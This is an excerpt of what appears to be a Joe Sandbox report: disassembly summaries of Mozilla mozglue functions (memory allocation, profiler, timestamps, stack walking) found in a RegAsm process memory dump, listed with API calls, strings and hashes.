                                                                                        • Part of subcall function 6C0E31C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0E328E
                                                                                        • Part of subcall function 6C0E31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0E32AB
                                                                                        • Part of subcall function 6C0E31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0E32D1
                                                                                        • Part of subcall function 6C0E31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C0E32E5
                                                                                        • Part of subcall function 6C0E31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C0E32F7
                                                                                      • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C0F9675
                                                                                      • __Init_thread_footer.LIBCMT ref: 6C0F9697
                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C0F96E8
                                                                                      • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C0F9707
                                                                                      • __Init_thread_footer.LIBCMT ref: 6C0F971F
                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C0F9773
                                                                                      • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C0F97B7
                                                                                      • FreeLibrary.KERNEL32 ref: 6C0F97D0
                                                                                      • FreeLibrary.KERNEL32 ref: 6C0F97EB
                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C0F9824
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                                                      • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                      • API String ID: 3361784254-3880535382
                                                                                      • Opcode ID: dd210641aedc5526fa843ee30c30797305764b6d29c1e679ef1a3edb6790e2e9
                                                                                      • Instruction ID: ba6fdd10b3721e6f7800b709212f3386a1fa1a38b59f8f8779bac68bd8c13b76
                                                                                      • Opcode Fuzzy Hash: dd210641aedc5526fa843ee30c30797305764b6d29c1e679ef1a3edb6790e2e9
                                                                                      • Instruction Fuzzy Hash: 8461E5717043059BDF00CF6AD888BAABBF5EB4A319F044529ED2583B80D7309995DBA1
                                                                                      APIs
                                                                                      • EnterCriticalSection.KERNEL32(6C16E768,?,00003000,00000004), ref: 6C0E3AC5
                                                                                      • LeaveCriticalSection.KERNEL32(6C16E768,?,00003000,00000004), ref: 6C0E3AE5
                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,?,00003000,00000004), ref: 6C0E3AFB
                                                                                      • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C0E3B57
                                                                                      • EnterCriticalSection.KERNEL32(6C16E784), ref: 6C0E3B81
                                                                                      • LeaveCriticalSection.KERNEL32(6C16E784), ref: 6C0E3BA3
                                                                                      • EnterCriticalSection.KERNEL32(6C16E7B8), ref: 6C0E3BAE
                                                                                      • LeaveCriticalSection.KERNEL32(6C16E7B8), ref: 6C0E3C74
                                                                                      • EnterCriticalSection.KERNEL32(6C16E784), ref: 6C0E3C8B
                                                                                      • LeaveCriticalSection.KERNEL32(6C16E784), ref: 6C0E3C9F
                                                                                      • LeaveCriticalSection.KERNEL32(6C16E7B8), ref: 6C0E3D5C
                                                                                      • EnterCriticalSection.KERNEL32(6C16E784), ref: 6C0E3D67
                                                                                      • LeaveCriticalSection.KERNEL32(6C16E784), ref: 6C0E3D8A
                                                                                        • Part of subcall function 6C120D60: VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C0E3DEF), ref: 6C120D71
                                                                                        • Part of subcall function 6C120D60: VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C0E3DEF), ref: 6C120D84
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$Leave$Enter$Virtual$Free$Alloc
                                                                                      • String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_CRASH()
                                                                                      • API String ID: 2380290044-2272602182
                                                                                      • Opcode ID: b664150e5c48d50902065471c20a154c0ebac616d4767e3da7a752b1dec14e2c
                                                                                      • Instruction ID: be1eea0faec31f1ab697a383625d1e617f575175119855522ca18f7d007959ca
                                                                                      • Opcode Fuzzy Hash: b664150e5c48d50902065471c20a154c0ebac616d4767e3da7a752b1dec14e2c
                                                                                      • Instruction Fuzzy Hash: C491BC317852058FCB04CF6AC98476ABBF2BF8E314F254628E9129BB91D771E901DBD1
                                                                                      APIs
                                                                                      • K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 6C0F8007
                                                                                      • moz_xmalloc.MOZGLUE(?,000000FF,00000000,00000000,?), ref: 6C0F801D
                                                                                        • Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26
                                                                                      • memset.VCRUNTIME140(00000000,00000000,?,?), ref: 6C0F802B
                                                                                      • K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 6C0F803D
                                                                                      • moz_xmalloc.MOZGLUE(00000104,000000FF,00000000,?,?,?,?,?,?), ref: 6C0F808D
                                                                                        • Part of subcall function 6C0FCA10: mozalloc_abort.MOZGLUE(?), ref: 6C0FCAA2
                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 6C0F809B
                                                                                      • GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C0F80B9
                                                                                      • moz_xmalloc.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C0F80DF
                                                                                      • memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0F80ED
                                                                                      • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0F80FB
                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0F810D
                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C0F8133
                                                                                      • free.MOZGLUE(00000000,000000FF,00000000,?,?,?,?,?,?), ref: 6C0F8149
                                                                                      • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?), ref: 6C0F8167
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6C0F817C
                                                                                      • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0F8199
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: free$memsetmoz_xmalloc$EnumModulesProcess$ErrorFileLastModuleNamemallocmozalloc_abortwcscpy_s
                                                                                      • String ID:
                                                                                      • API String ID: 2721933968-0
                                                                                      • Opcode ID: 43e693aba5aa5109797c5a7a77b5eca7d8ffbb1d0d4c431749b5b9796097733f
                                                                                      • Instruction ID: d4424189c6af662f2aef32f016d66b4ddb3e1547be4cf5358a057d4d7e8f1143
                                                                                      • Opcode Fuzzy Hash: 43e693aba5aa5109797c5a7a77b5eca7d8ffbb1d0d4c431749b5b9796097733f
                                                                                      • Instruction Fuzzy Hash: 325193B2E002145BDB00DFA6DC84BEFB7F9AF49664F580225EC25E7741E730A945CBA1
                                                                                      APIs
                                                                                      • memcpy.VCRUNTIME140(?,Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32,00000084), ref: 6C0F1213
                                                                                      • toupper.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C0F1285
                                                                                      • memcpy.VCRUNTIME140(?,TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32,00000076), ref: 6C0F12B9
                                                                                      • memcpy.VCRUNTIME140(?,CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32,00000078,?), ref: 6C0F1327
                                                                                      Strings
                                                                                      • TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32, xrefs: 6C0F12AD
                                                                                      • &, xrefs: 6C0F126B
                                                                                      • MZx, xrefs: 6C0F11E1
                                                                                      • Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32, xrefs: 6C0F120D
                                                                                      • CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32, xrefs: 6C0F131B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy$toupper
                                                                                      • String ID: &$CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32$Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32$MZx$TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32
                                                                                      • API String ID: 403083179-3658087426
                                                                                      • Opcode ID: 600dd652048b5829faf488876d1e51be270b043562b7ca751139ad65689bfab8
                                                                                      • Instruction ID: 4cd930c98e1952b1e668f4c1bb5476090351489b9cb4f13b0ab14122e0ad8110
                                                                                      • Opcode Fuzzy Hash: 600dd652048b5829faf488876d1e51be270b043562b7ca751139ad65689bfab8
                                                                                      • Instruction Fuzzy Hash: 1371A1B1E053588ADB109F64C8047EEB7F5BF89309F04065AD855A3B40DB74BADACB92
                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C0E3217
                                                                                      • GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C0E3236
                                                                                      • FreeLibrary.KERNEL32 ref: 6C0E324B
                                                                                      • __Init_thread_footer.LIBCMT ref: 6C0E3260
                                                                                      • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C0E327F
                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0E328E
                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0E32AB
                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0E32D1
                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C0E32E5
                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C0E32F7
                                                                                        • Part of subcall function 6C11AB89: EnterCriticalSection.KERNEL32(6C16E370,?,?,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284), ref: 6C11AB94
                                                                                        • Part of subcall function 6C11AB89: LeaveCriticalSection.KERNEL32(6C16E370,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284,?,?,6C1056F6), ref: 6C11ABD1
                                                                                      • __aulldiv.LIBCMT ref: 6C0E346B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Time$StampV01@@Value@mozilla@@$CriticalLibrarySectionStamp@mozilla@@$AddressCreation@EnterFreeInit_thread_footerLeaveLoadNow@ProcProcessV12@V12@___aulldiv
                                                                                      • String ID: KernelBase.dll$QueryInterruptTime
                                                                                      • API String ID: 3006643210-2417823192
                                                                                      • Opcode ID: 493b3190c49d61f4f35ba994c1dff5f5172bdc1fba2435fb7973cfe8e088da7e
                                                                                      • Instruction ID: 3da3735f5487457ffdc061cbb731a2d7026d57653c4053b70373cb45ed9d5645
                                                                                      • Opcode Fuzzy Hash: 493b3190c49d61f4f35ba994c1dff5f5172bdc1fba2435fb7973cfe8e088da7e
                                                                                      • Instruction Fuzzy Hash: 7F61EFB1A087418FC711CF39C45176AB7F5BF8A354F218B1DF8A5A36A0EB31A549CB42
                                                                                      APIs
                                                                                      • InitializeCriticalSection.KERNEL32(6C16F618), ref: 6C146694
                                                                                      • GetThreadId.KERNEL32(?), ref: 6C1466B1
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C1466B9
                                                                                      • memset.VCRUNTIME140(?,00000000,00000100), ref: 6C1466E1
                                                                                      • EnterCriticalSection.KERNEL32(6C16F618), ref: 6C146734
                                                                                      • GetCurrentProcess.KERNEL32 ref: 6C14673A
                                                                                      • LeaveCriticalSection.KERNEL32(6C16F618), ref: 6C14676C
                                                                                      • GetCurrentThread.KERNEL32 ref: 6C1467FC
                                                                                      • memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C146868
                                                                                      • RtlCaptureContext.NTDLL ref: 6C14687F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
                                                                                      • String ID: WalkStack64
                                                                                      • API String ID: 2357170935-3499369396
                                                                                      • Opcode ID: 187fda6eef1f46595bb019de377af4938f2e457bf62bf37534e7c60662159f04
                                                                                      • Instruction ID: 1149258b0810932d408363a10a25bc05a746df157b122b727bc0b102a5a1eaf8
                                                                                      • Opcode Fuzzy Hash: 187fda6eef1f46595bb019de377af4938f2e457bf62bf37534e7c60662159f04
                                                                                      • Instruction Fuzzy Hash: 1651DB71A09305AFDB11CF25C884B6ABBF4FF99718F00892DF99887640D774E919CB92
                                                                                      APIs
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0F4A68), ref: 6C12945E
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C129470
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C129482
                                                                                        • Part of subcall function 6C129420: __Init_thread_footer.LIBCMT ref: 6C12949F
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12DE73
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12DF7D
                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12DF8A
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12DFC9
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12DFF7
                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C12E000
                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C0F4A68), ref: 6C12DE7B
                                                                                        • Part of subcall function 6C1294D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1294EE
                                                                                        • Part of subcall function 6C1294D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C129508
                                                                                        • Part of subcall function 6C11CBE8: GetCurrentProcess.KERNEL32(?,6C0E31A7), ref: 6C11CBF1
                                                                                        • Part of subcall function 6C11CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0E31A7), ref: 6C11CBFA
                                                                                      • ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C0F4A68), ref: 6C12DEB8
                                                                                      • free.MOZGLUE(00000000,?,6C0F4A68), ref: 6C12DEFE
                                                                                      • ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C12DF38
                                                                                      Strings
                                                                                      • [I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C12E00E
                                                                                      • [I %d/%d] locked_profiler_stop, xrefs: 6C12DE83
                                                                                      • <none>, xrefs: 6C12DFD7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
                                                                                      • String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
                                                                                      • API String ID: 1281939033-809102171
                                                                                      • Opcode ID: d88124d5fe23dddc7add8255d8b0375885ce4bf136864d25b8a09a7c2b005183
                                                                                      • Instruction ID: 5e485a683c9b3aae742fd0453a609507d00a3926166a9c96c95595e0c35e9f18
                                                                                      • Opcode Fuzzy Hash: d88124d5fe23dddc7add8255d8b0375885ce4bf136864d25b8a09a7c2b005183
                                                                                      • Instruction Fuzzy Hash: 4E41473AB052109BDB20AF6AD8187BA7775FF4530CF140065EA1597F41CB38A846DBE6
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C13D85F
                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C13D86C
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C13D918
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C13D93C
                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C13D948
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C13D970
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C13D976
                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C13D982
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C13D9CF
                                                                                      • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C13DA2E
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C13DA6F
                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C13DA78
                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE ref: 6C13DA91
                                                                                        • Part of subcall function 6C105C50: GetTickCount64.KERNEL32 ref: 6C105D40
                                                                                        • Part of subcall function 6C105C50: EnterCriticalSection.KERNEL32(6C16F688), ref: 6C105D67
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C13DAB7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Count64CriticalEnterSectionStampTickTimeV01@@Value@mozilla@@Xbad_function_call@std@@
                                                                                      • String ID:
                                                                                      • API String ID: 1195625958-0
                                                                                      • Opcode ID: b6df9c7ecc7e94bb032376842a70f569214c6fcaa29291014db7381e8010f255
                                                                                      • Instruction ID: 70096a53ad8e69cbd47d699a35277c71398c5e1eb5cabb6e0af2e3b567826b0e
                                                                                      • Opcode Fuzzy Hash: b6df9c7ecc7e94bb032376842a70f569214c6fcaa29291014db7381e8010f255
                                                                                      • Instruction Fuzzy Hash: 2771BC716043149FCB00DF29C888BAABBF5FF89358F158569F85A9B301DB30A944DBA1
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C13D4F0
                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C13D4FC
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C13D52A
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C13D530
                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C13D53F
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C13D55F
                                                                                      • free.MOZGLUE(00000000), ref: 6C13D585
                                                                                      • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C13D5D3
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C13D5F9
                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C13D605
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C13D652
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C13D658
                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C13D667
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C13D6A2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                                      • String ID:
                                                                                      • API String ID: 2206442479-0
                                                                                      • Opcode ID: 8b99b90bdee76de84a620a721ccaae6d507601f2da89aa9c743c5f4cb282b6c0
                                                                                      • Instruction ID: 89d543475b67d090201dcb3ea1bf35488bddf3a7be0c4a9dcfcca59bc3ee1a3d
                                                                                      • Opcode Fuzzy Hash: 8b99b90bdee76de84a620a721ccaae6d507601f2da89aa9c743c5f4cb282b6c0
                                                                                      • Instruction Fuzzy Hash: B8515AB1604705DFC704DF35C888AAABBB4FF89358F00962EE85A87711DB34E949DB91
                                                                                      APIs
                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C1056D1
                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C1056E9
                                                                                      • ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C1056F1
                                                                                      • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C105744
                                                                                      • ??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C1057BC
                                                                                      • GetTickCount64.KERNEL32 ref: 6C1058CB
                                                                                      • EnterCriticalSection.KERNEL32(6C16F688), ref: 6C1058F3
                                                                                      • __aulldiv.LIBCMT ref: 6C105945
                                                                                      • LeaveCriticalSection.KERNEL32(6C16F688), ref: 6C1059B2
                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C16F638,?,?,?,?), ref: 6C1059E9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
                                                                                      • String ID: MOZ_APP_RESTART
                                                                                      • API String ID: 2752551254-2657566371
